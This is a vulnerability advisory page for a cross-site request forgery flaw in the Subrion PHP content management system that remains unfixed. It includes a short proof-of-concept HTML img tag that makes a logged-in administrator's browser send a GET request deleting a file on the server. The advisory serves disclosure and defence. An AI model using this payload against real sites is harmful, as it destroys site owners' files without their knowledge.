Cross-Site Request Forgery (CSRF) Affecting intelliants/subrion package, versions >=0.0.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.12% (46th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-INTELLIANTSSUBRION-6674056
- published 26 Apr 2024
- disclosed 24 May 2022
- credit Unknown
Introduced: 24 May 2022
CVE-2019-20390 Open this link in a new tabHow to fix?
There is no fixed version for intelliants/subrion
.
Overview
intelliants/subrion is an open source php content management system.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) due to the application's failure to validate the CSRF token
for a GET
request. An attacker can craft a malicious URL and send it to the victim, leading to unauthorized file removal on the server without the victim's knowledge.
PoC
<!-- Cancel file test.txt (l1_ci90ZXN0LnR4dA) from directory rm. -->
<html>
<img src="http://localhost/subrion/panel/uploads/read.json?cmd=rm&targets[]=l1_ci90ZXN0LnR4dA" />
</html>
References
CVSS Scores
version 3.1